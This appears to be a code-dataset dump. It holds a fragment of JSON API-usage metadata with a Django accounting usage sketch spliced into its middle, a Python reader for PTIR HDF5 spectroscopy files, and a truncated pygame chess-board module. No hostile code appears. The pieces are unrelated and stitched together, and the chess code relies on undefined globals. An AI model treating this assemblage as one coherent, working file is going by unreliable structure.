84, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 84, "usage_type": "name"}, {"api_name": "os.path.join", 
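A booking moves `amount` from `fromAccount` to `toAccount`, and `sumOfAllBookings` nets incoming minus outgoing bookings, flipping the sign for 'S' and 'L' accounts. A minimal sketch of that convention, assuming a configured Django project with this accounting app installed and migrated; the account numbers, titles and demo user are made up:

# usage sketch (not part of models.py)
from datetime import datetime
from decimal import Decimal
from django.contrib.auth.models import User
from koalixcrm.accounting.models import Account, AccountingPeriod, Booking

bot = User.objects.create(username="demo", is_staff=True)
period = AccountingPeriod.objects.create(title="Year 2020",
                                         begin=datetime(2020, 1, 1).date(),
                                         end=datetime(2020, 12, 31).date())
flags = dict(isopenreliabilitiesaccount=False, isopeninterestaccount=False,
             isProductInventoryActiva=False, isACustomerPaymentAccount=False)
cash = Account.objects.create(accountNumber=1000, title="Cash", accountType="A", **flags)
sales = Account.objects.create(accountNumber=3000, title="Sales", accountType="E", **flags)

Booking.objects.create(fromAccount=sales, toAccount=cash, amount=Decimal("250.00"),
                       bookingDate=datetime(2020, 3, 1), accountingPeriod=period,
                       staff=bot, lastmodifiedby=bot)

print(cash.sumOfAllBookings())   # Decimal('250.00'): 250 in, 0 out
print(sales.sumOfAllBookings())  # Decimal('-250.00'): 'E' accounts are not sign-flipped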
"line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 87, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 87, "usage_type": "name"}, {"api_name": "koalixcrm.accounting.exceptions.ProgrammingError", "line_number": 90, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 92, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 92, "usage_type": "name"}, {"api_name": "koalixcrm.accounting.exceptions.NoObjectsToBeSerialzed", "line_number": 94, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 94, "usage_type": "call"}, {"api_name": "koalixcrm.djangoUserExtension.models.UserExtension.objects.filter", "line_number": 103, "usage_type": "call"}, {"api_name": "koalixcrm.djangoUserExtension.models", "line_number": 103, "usage_type": "attribute"}, {"api_name": "koalixcrm.djangoUserExtension", "line_number": 103, "usage_type": "name"}, {"api_name": "koalixcrm.crm.exceptions.UserExtensionMissing", "line_number": 105, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 105, "usage_type": "call"}, {"api_name": "xml.dom.minidom.Document", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 109, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 109, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 112, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 112, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 169, "usage_type": "call"}, {"api_name": "django.conf.settings.FOP_EXECUTABLE", "line_number": 170, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 170, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 171, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 171, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 173, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 173, "usage_type": "name"}, {"api_name": "subprocess.STDOUT", "line_number": 173, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path", "line_number": 174, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 174, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 
174, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 176, "usage_type": "call"}, {"api_name": "django.conf.settings.FOP_EXECUTABLE", "line_number": 177, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 177, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 178, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 178, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 180, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 180, "usage_type": "name"}, {"api_name": "subprocess.STDOUT", "line_number": 180, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 181, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 181, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 190, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 191, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 194, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 194, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 195, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 195, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 195, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 196, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 196, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 196, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 197, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 197, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 197, "usage_type": "call"}, {"api_name": "django.db.models.TextField", "line_number": 198, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 198, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 198, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 199, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 199, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 199, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 200, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 200, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 200, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 201, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 201, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 201, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 202, 
"usage_type": "call"}, {"api_name": "django.db.models", "line_number": 202, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 202, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 210, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 260, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 261, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 265, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 265, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 266, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 266, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 266, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 267, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 267, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 267, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 269, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 269, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 269, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 274, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 275, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 281, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 281, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 282, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 282, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 282, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 283, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 283, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 283, "usage_type": "call"}, {"api_name": "django.db.models.DecimalField", "line_number": 284, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 284, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 284, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 285, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 285, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 285, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 286, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 286, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 286, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 287, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 287, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 287, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 288, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 288, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 288, "usage_type": "call"}, 
{"api_name": "django.db.models.ForeignKey", "line_number": 289, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 289, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 290, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 291, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 291, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 291, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 292, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 292, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 292, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 293, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 293, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 294, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 299, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 306, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 307, "usage_type": "call"}]} +{"seq_id": "427267188", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 9 16:16:44 2020\n\n@author: carl\n\"\"\"\n\n# from struct import unpack\nimport h5py\nimport numpy as np\nfrom .image import Image\n\nclass PtirReader:\n \"\"\"\n A simple class to extract data from a PTIR Studio HDF5 file. This is meant\n as an alternative to .mat export and will only load the spectra from\n the scanned points, not the whole image in some specific wavenumber.\n\n Member variables:\n wh: image dimensions (w, h)\n wavenum: array of wavenumbers\n AB: data matrix, array(w*h, len(wn))\n image: tuple (img_data_bytes, img_type_str)\n \"\"\"\n\n def __init__(self, filename=None):\n \"\"\"\n filename: HDF5 file to load data from\n \"\"\"\n self.wh = None\n self.xy = None\n self.wavenum = None\n self.AB = None\n self.images = []\n if filename is not None:\n self.load(filename)\n\n def load(self, filename, clip_to_images=True):\n f = h5py.File(filename, mode='r')\n\n wns = []\n raw = []\n xy = []\n for k, v in f.items():\n if 'MirageDC' in v.attrs:\n wn = v['Spectroscopic_Values'][0,:]\n wns.append(wn)\n for kk, vv in v.items():\n try:\n r = vv['Raw_Data']\n except (AttributeError, ValueError):\n continue\n d = r[0,:]\n if d.shape != wn.shape:\n # print('incompatible shapes', d.shape, wn.shape)\n continue\n raw.append(d)\n try:\n xy.append([v.attrs['LocationX'][0],\n v.attrs['LocationY'][0]])\n except AttributeError:\n xy.append([0, 0])\n if not wns:\n raise RuntimeError('No spectra in input file')\n if not all([len(w) == len(wns[0]) for w in wns]):\n raise NotImplementedError('Unable to load spectra of different length')\n wns = np.array(wns)\n beg = wns[:,0]\n end = wns[:,-1]\n if beg.max() - beg.min() > 5 or end.max() - end.min() > 5:\n raise NotImplementedError('Unable to load spectra with different wavenumbers')\n self.wavenum = np.median(wns, axis=0)[::-1]\n self.AB = np.array(raw)[:, ::-1]\n self.xy = np.array(xy)\n self.wh = (len(self.AB), 1)\n\n self.images = []\n for imtype in ['Image', 'Heightmap']:\n for imnum in range(1000):\n try:\n im = f['%ss' % (imtype)]['%s_%03d' % (imtype, imnum)]\n except (KeyError):\n break\n else:\n if imtype == 'Image':\n imname = im.name\n else:\n 
                        imwnum = im.attrs['IRWavenumber'].decode()
                        imname = imwnum + " " + im.attrs['Label'].decode()
                    img = Image(data=im[()][::-1, :], name=imname)
                    img.xy = [im.attrs['PositionX'][0],
                              im.attrs['PositionY'][0]]
                    img.wh = [im.attrs['SizeWidth'][0],
                              im.attrs['SizeHeight'][0]]
                    self.images.append(img)

        if clip_to_images:
            # Remove pixels outside the imaging area (always the first one?)
            imgxy = np.array([img.xy for img in self.images])
            imgwh = np.array([img.wh for img in self.images])
            minxy = (imgxy - imgwh / 2).min(0)
            maxxy = (imgxy + imgwh / 2).max(0)
            inside = (minxy <= self.xy).all(1) & (self.xy <= maxxy).all(1)
            self.xy = self.xy[inside, :]
            self.AB = self.AB[inside, :]
            self.wh = (len(self.AB), 1)
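A minimal usage sketch of the reader above. The filename is a placeholder for a PTIR Studio HDF5 export, and the printed attributes assume the Image helper keeps the name, xy and wh values assigned in load():

# usage sketch (not part of ptirreader.py)
from octavvs.io.ptirreader import PtirReader

reader = PtirReader('measurement.ptir')   # hypothetical file name
print(reader.wavenum.shape)               # wavenumbers, ascending after the [::-1] flip
print(reader.AB.shape)                    # (n_points, n_wavenumbers)
print(reader.xy[:3])                      # stage coordinates of the first points
for img in reader.images:
    print(img.name, img.wh)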
# --- chess board module (pygame) ---

import sys
import random
import pygame
from gameConstants import *
from menu import *


"""
Instances of this class represent a single square on an 8x8 chessboard.
Each square has the following attributes:
- color (black or white)
- position (eg: the top left square is at position (1, 1))
- sidelength
- square (a pygame.Rect object which is used to detect whether a
  particular square was clicked)
- location (the location to assign to the top-left corner of the square
  attribute)
"""
class ChessSquare:
    color = 0, 0, 0
    position = 0, 0
    square = None
    sidelength = 0
    location = 0, 0

    def __init__(self, color, position, sidelength, location):
        self.color = color
        self.position = position
        self.sidelength = sidelength
        self.location = location
        self.square = pygame.Rect(self.location, (self.sidelength, self.sidelength))

    """
    Draws the square (by invoking pygame.draw.rect) to the surface
    passed in the screen argument.
    """
    def draw(self, screen):
        pygame.draw.rect(screen, self.color, self.square)


class Board:
    surface = None
    rect = None
    squareList = []
    pieceListWhite = []
    pieceListBlack = []
    currentPieceList = []
    waitingPieceList = []
    selectedPiece = None
    doubleUpPawn = None
    enPassantSpace = None
    highlightedSquares = []

    def __init__(self, surface, position, sideLength):
        self.surface = surface
        self.rect = pygame.draw.rect(surface, BLACK, (position, (sideLength, sideLength)))
        squareLength = sideLength / 8
        for i in range(0, 8):
            for j in range(0, 8):
                currentSquarePos = i * squareLength + position[0], j * squareLength + position[1]
                squarecolor = BROWN if (i + j) % 2 == 0 else BLACK
                newSquare = ChessSquare(squarecolor, (j + 1, i + 1), squareLength, currentSquarePos)
                self.squareList.append(newSquare)

        self.setInitialPositions()
        for piece in self.pieceListWhite:
            piece.updatePotentialSpaces(self.pieceListWhite, self.pieceListBlack, False)
        for piece in self.pieceListBlack:
            piece.updatePotentialSpaces(self.pieceListBlack, self.pieceListWhite, False)
        self.currentPieceList = self.pieceListWhite
        self.waitingPieceList = self.pieceListBlack

    def setInitialPositions(self):
        # initialize white pieces
        for i in range(8):
            self.pieceListWhite.append(Pawn(whitePawnImage, self.getSquarebyPosition((7, i + 1)), player1Color))
        self.pieceListWhite.append(Rook(whiteRookImage, self.getSquarebyPosition((8, 1)), player1Color))
        self.pieceListWhite.append(Rook(whiteRookImage, self.getSquarebyPosition((8, 8)), player1Color))
        self.pieceListWhite.append(Knight(whiteKnightImage, self.getSquarebyPosition((8, 2)), player1Color))
        self.pieceListWhite.append(Knight(whiteKnightImage, self.getSquarebyPosition((8, 7)), player1Color))
        self.pieceListWhite.append(Bishop(whiteBishopImage, self.getSquarebyPosition((8, 3)), player1Color))
        self.pieceListWhite.append(Bishop(whiteBishopImage, self.getSquarebyPosition((8, 6)), player1Color))
        self.pieceListWhite.append(Queen(whiteQueenImage, self.getSquarebyPosition((8, 4)), player1Color))
        self.pieceListWhite.append(King(whiteKingImage, self.getSquarebyPosition((8, 5)), player1Color))
        # initialize black pieces
        for i in range(8):
            self.pieceListBlack.append(Pawn(blackPawnImage, self.getSquarebyPosition((2, i + 1)), player2Color))
        self.pieceListBlack.append(Rook(blackRookImage, self.getSquarebyPosition((1, 1)), player2Color))
        self.pieceListBlack.append(Rook(blackRookImage, self.getSquarebyPosition((1, 8)), player2Color))
        self.pieceListBlack.append(Knight(blackKnightImage, self.getSquarebyPosition((1, 2)), player2Color))
        self.pieceListBlack.append(Knight(blackKnightImage, self.getSquarebyPosition((1, 7)), player2Color))
        self.pieceListBlack.append(Bishop(blackBishopImage, self.getSquarebyPosition((1, 3)), player2Color))
        self.pieceListBlack.append(Bishop(blackBishopImage, self.getSquarebyPosition((1, 6)), player2Color))
        self.pieceListBlack.append(Queen(blackQueenImage, self.getSquarebyPosition((1, 4)), player2Color))
        self.pieceListBlack.append(King(blackKingImage, self.getSquarebyPosition((1, 5)), player2Color))

    def draw(self):
        for square in self.squareList:
            square.draw(self.surface)
        for piece in self.pieceListWhite:
            piece.draw(self.surface)
        for piece in self.pieceListBlack:
            piece.draw(self.surface)

    def getSquarebyPosition(self, position):
        for square in self.squareList:
            if position == square.position:
                return square
        return None

    def getSquarebyMousePosition(self, position):
        for square in self.squareList:
            if square.square.collidepoint(position):
                return square
        return None

    @staticmethod
    def isOccupied(pieceList, position):
        for piece in pieceList:
            if position == piece.position:
                return True
        return False

    @staticmethod
    def getPiecebyRank(pieceList, rank):
        for piece in pieceList:
            if piece.rank == rank:
                return piece
        return None

    @staticmethod
    def getPiecebyPosition(pieceList, position):
        for piece in pieceList:
            if piece.position == position:
                return piece
        return None

    def highlightMovableSquares(self, piece):
        self.highlightedSquares = []
        for space in piece.potentialSpaces:
            self.highlightedSquares.append(self.getSquarebyPosition(space))
        for square in self.highlightedSquares:
            color = YELLOW if (square.position[0] + square.position[1]) % 2 == 0 else YELLOW2
            square.color = color
            square.draw(self.surface)
            for piece in self.waitingPieceList:
                if square.position == piece.position:
                    piece.draw(self.surface)
                    break

    def unhighlightMovableSquares(self):
        for square in self.highlightedSquares:
            color = BROWN if (square.position[0] + square.position[1]) % 2 == 0 else BLACK
            square.color = color
            square.draw(self.surface)
            for piece in self.waitingPieceList:
                if square.position == piece.position:
                    piece.draw(self.surface)
                    break

    @staticmethod
    def getGameState(threateningPiece, currentPieceList, waitingPieceList):
        if Board.checked(threateningPiece, currentPieceList, waitingPieceList):
            pygame.mixer.music.load(checkSound)
            pygame.mixer.music.play()
        threateningPiece.updatePotentialSpaces(currentPieceList, waitingPieceList, False)
        waitingKingPosition = Board.getPiecebyRank(waitingPieceList, kingRank).position
        allOpponentSpaces = []
        for piece in waitingPieceList:
            piece.updatePotentialSpaces(waitingPieceList, currentPieceList, True)
            allOpponentSpaces += piece.potentialSpaces
        # no legal reply: checkmate if the king is attacked, stalemate otherwise
        if len(allOpponentSpaces) == 0:
            if waitingKingPosition in threateningPiece.potentialSpaces:
                return CHECKMATE
            else:
                return STALEMATE
        return RUNNING

    @staticmethod
    def checked(threateningPiece, threateningPieceList, threatenedPieceList):
        threateningPiece.updatePotentialSpaces(threateningPieceList, threatenedPieceList, False)
        waitingKingPosition = Board.getPiecebyRank(threatenedPieceList, kingRank).position
        if waitingKingPosition in threateningPiece.potentialSpaces:
            return True
        return False

    def checkPawnPromotion(self, pawn, pawnPieceList):
        if pawn.rank != pawnRank:
            return
        if pawn.position[0] == 1 and pawn.color == player1Color or pawn.position[0] == 8 and pawn.color == player2Color:
            newPiece = None
            color = pawn.color
            newRank = launchPromotionMenu(self.surface, 600, 600, color)
            if newRank == PROMOTETOQUEEN:
                image = whiteQueenImage if color == player1Color else blackQueenImage
                newPiece = Queen(image, self.getSquarebyPosition(pawn.position), color)
            elif newRank == PROMOTETOROOK:
                image = whiteRookImage if color == player1Color else blackRookImage
                newPiece = Rook(image, self.getSquarebyPosition(pawn.position), color)
            elif newRank == PROMOTETOBISHOP:
                image = whiteBishopImage if color == player1Color else blackBishopImage
                newPiece = Bishop(image, self.getSquarebyPosition(pawn.position), color)
            elif newRank == PROMOTETOKNIGHT:
                image = whiteKnightImage if color == player1Color else blackKnightImage
                newPiece = Knight(image, self.getSquarebyPosition(pawn.position), color)
            pawnPieceList.remove(pawn)
            pawnPieceList.append(newPiece)
            self.selectedPiece = newPiece

    def checkEnPassant(self, pawn, pawnPieceList, opponentPieceList):
        potentialSpace = self.enPassantSpace
        if abs(pawn.position[0] - potentialSpace[0]) != 1 or abs(pawn.position[1] - potentialSpace[1]) != 1:
            return
        futureOpponentPieceList = opponentPieceList.copy()
        futureOpponentPieceList.remove(self.doubleUpPawn)
        if not pawn.leavesKingOpen(pawnPieceList, futureOpponentPieceList, potentialSpace):
            pawn.potentialSpaces.append(potentialSpace)

    def castle(self, king, rook, newKingPosition):
        oldRookSquare = self.getSquarebyPosition(rook.position)
        oldRookSquare.draw(self.surface)
        oldKingSquare = self.getSquarebyPosition(king.position)
        oldKingSquare.draw(self.surface)
        newKingSquare = self.getSquarebyPosition(newKingPosition)
        king.move(newKingSquare)
        # place the rook on the far side of the king, depending on castling direction
        if rook.position[1] > king.position[1]:
            newRookSquare = self.getSquarebyPosition((newKingPosition[0], newKingPosition[1] - 1))
            rook.move(newRookSquare)
        else:
            newRookSquare = self.getSquarebyPosition((newKingPosition[0], newKingPosition[1] + 1))
            rook.move(newRookSquare)
        self.unhighlightMovableSquares()
        king.draw(self.surface)
        rook.draw(self.surface)

    def reset(self):
        self.pieceListWhite = []
        self.pieceListBlack = []
        self.setInitialPositions()
        self.currentPieceList = self.pieceListWhite
        self.waitingPieceList = self.pieceListBlack
        self.selectedPiece = None

    def changeTurn(self):
        temp = self.currentPieceList
        self.currentPieceList = self.waitingPieceList
        self.waitingPieceList = temp
        self.selectedPiece = None

    def rotate(self):
        for piece in self.pieceListWhite:
            newSquare = self.getSquarebyPosition((9 - piece.row, 9 - piece.col))
            piece.setPosition(newSquare)
        for piece in self.pieceListBlack:
            newSquare = self.getSquarebyPosition((9 - piece.row, 9 - piece.col))
            piece.setPosition(newSquare)

    def playKillSound(self):
        randIndex = random.randrange(0, len(captureSounds))
        pygame.mixer.music.load(captureSounds[randIndex])
        pygame.mixer.music.play()

    def playPVP(self):
        while True:
            pygame.display.update()
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    endOption = launchEndMenu(screen, EXIT, self.currentPieceList[0].color,
                                              self.waitingPieceList[0].color)
                    if endOption == QUIT:
                        pygame.quit()
                        sys.exit()
                    elif endOption == REMATCH:
                        board.reset()
                        board.draw()
                        break
                    elif endOption == MAINMENU:
                        board.reset()
                        return
                if event.type == pygame.MOUSEBUTTONDOWN:
                    # the en-passant window closes as soon as the doubled-up pawn's owner moves again
                    if self.doubleUpPawn and self.doubleUpPawn.color == self.currentPieceList[0].color:
                        self.doubleUpPawn = None
                        self.enPassantSpace = None
                    clickpos = pygame.mouse.get_pos()
                    clickedSquare = self.getSquarebyMousePosition(clickpos)
                    if clickedSquare:
                        clickedPosition = clickedSquare.position
                        isMyPiece = False
                        clickedPiece = Board.getPiecebyPosition(self.currentPieceList, clickedPosition)
                        if clickedPiece:
                            isMyPiece = True
                        else:
                            clickedPiece = Board.getPiecebyPosition(self.waitingPieceList, clickedPosition)
                            isMyPiece = False
                        if clickedPiece:
                            if not self.selectedPiece:
                                if isMyPiece:
                                    self.selectedPiece = clickedPiece
                                    selectedRank = self.selectedPiece.rank
                                    print("piece at ", clickedPiece.position, " selected!")
                                    clickedSquare.color = RED
                                    clickedSquare.draw(board.surface)
                                    clickedPiece.draw(board.surface)
                                    clickedSquare.color = BROWN if (clickedPosition[0] + clickedPosition[1]) % 2 == 0 else BLACK
                                    self.selectedPiece.updatePotentialSpaces(self.currentPieceList, self.waitingPieceList, True)
                                    if selectedRank == pawnRank and self.doubleUpPawn:
                                        if self.selectedPiece.color == player1Color:
                                            self.enPassantSpace = self.doubleUpPawn.position[0] - 1, self.doubleUpPawn.position[1]
                                        else:
                                            self.enPassantSpace = self.doubleUpPawn.position[0] + 1, self.doubleUpPawn.position[1]
                                        self.checkEnPassant(self.selectedPiece, self.currentPieceList, self.waitingPieceList)
                                    self.highlightMovableSquares(self.selectedPiece)
                            elif self.selectedPiece == clickedPiece:
                                self.selectedPiece = None
                                print("piece at ", clickedPiece.position, " deselected!")
                                clickedSquare.color = BROWN if (clickedPosition[0] + clickedPosition[1]) % 2 == 0 else BLACK
                                clickedSquare.draw(board.surface)
                                clickedPiece.draw(board.surface)
                                self.unhighlightMovableSquares()
                            else:
                                if clickedPosition in self.selectedPiece.potentialSpaces:
                                    print("piece at ", self.selectedPiece.position, " kills piece at ", clickedPiece.position)
                                    self.playKillSound()
                                    self.waitingPieceList.remove(clickedPiece)
                                    oldSquare = board.getSquarebyPosition(self.selectedPiece.position)
                                    oldSquare.draw(board.surface)
                                    clickedSquare.draw(board.surface)
                                    self.unhighlightMovableSquares()
                                    self.selectedPiece.move(clickedSquare)
                                    self.checkPawnPromotion(self.selectedPiece, self.currentPieceList)
                                    self.selectedPiece.draw(board.surface)
                                    # looking for checkmate!
                                    gameState = Board.getGameState(self.selectedPiece, self.currentPieceList, self.waitingPieceList)
                                    if gameState == CHECKMATE or gameState == STALEMATE:
                                        endOption = launchEndMenu(screen, gameState, self.currentPieceList[0].color,
                                                                  self.waitingPieceList[0].color)
                                        if endOption == QUIT:
                                            pygame.quit()
                                            sys.exit()
                                        elif endOption == REMATCH:
                                            board.reset()
                                            board.draw()
                                            break
                                        elif endOption == MAINMENU:
                                            board.reset()
                                            return
                                    self.draw()
                                    self.changeTurn()
                                else:
                                    print(self.selectedPiece.potentialSpaces)
                                    print("piece at ", self.selectedPiece.position, " can't move there!")
                        else:
                            if self.selectedPiece:
                                selectedRank = self.selectedPiece.rank
                                # a possible en-passant capture was already appended when the pawn was selected
                                if clickedPosition in self.selectedPiece.potentialSpaces:
                                    # if the selected piece is a king and castling is available and chosen
                                    if selectedRank == kingRank and clickedPosition in self.selectedPiece.castlingPositions:
                                        for rook in self.selectedPiece.rooksToCastle:
                                            if abs(rook.position[1] - clickedPosition[1]) <= 2:
                                                self.castle(self.selectedPiece, rook, clickedPosition)
                                                break
                                    else:
                                        if self.doubleUpPawn and clickedPosition == self.enPassantSpace:
                                            self.playKillSound()
                                            self.waitingPieceList.remove(self.doubleUpPawn)
                                            killedPawnSquare = self.getSquarebyPosition(self.doubleUpPawn.position)
                                            killedPawnSquare.draw(self.surface)
                                        oldSquare = board.getSquarebyPosition(self.selectedPiece.position)
                                        oldSquare.draw(board.surface)
                                        if selectedRank == pawnRank and abs(self.selectedPiece.row - clickedPosition[0]) == 2:
                                            self.doubleUpPawn = self.selectedPiece
                                        self.unhighlightMovableSquares()
                                        self.selectedPiece.move(clickedSquare)
                                        self.checkPawnPromotion(self.selectedPiece, self.currentPieceList)
                                        self.selectedPiece.draw(board.surface)
                                    # looking for checkmate!
                                    gameState = Board.getGameState(self.selectedPiece, self.currentPieceList, self.waitingPieceList)
                                    if gameState == CHECKMATE or gameState == STALEMATE:
                                        endOption = launchEndMenu(screen, gameState, self.currentPieceList[0].color,
                                                                  self.waitingPieceList[0].color)
                                        if endOption == QUIT:
                                            pygame.quit()
                                            sys.exit()
                                        elif endOption == REMATCH:
                                            board.reset()
                                            board.draw()
                                            break
                                        elif endOption == MAINMENU:
                                            board.reset()
                                            return
                                    self.draw()
                                    self.changeTurn()
                                else:
                                    print(self.selectedPiece.potentialSpaces)
                                    print("piece at ", self.selectedPiece.position, " can't move there!")
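# ---------------------------------------------------------------------------
# The methods above reference module-level names such as `screen` and `board`
# (expected to come from gameConstants or from later in this file, which is
# truncated below). A minimal, hypothetical bootstrap could look like this
# sketch; the 600x600 window size is an assumption, not taken from the
# original sources:
#
#     pygame.init()
#     pygame.mixer.init()
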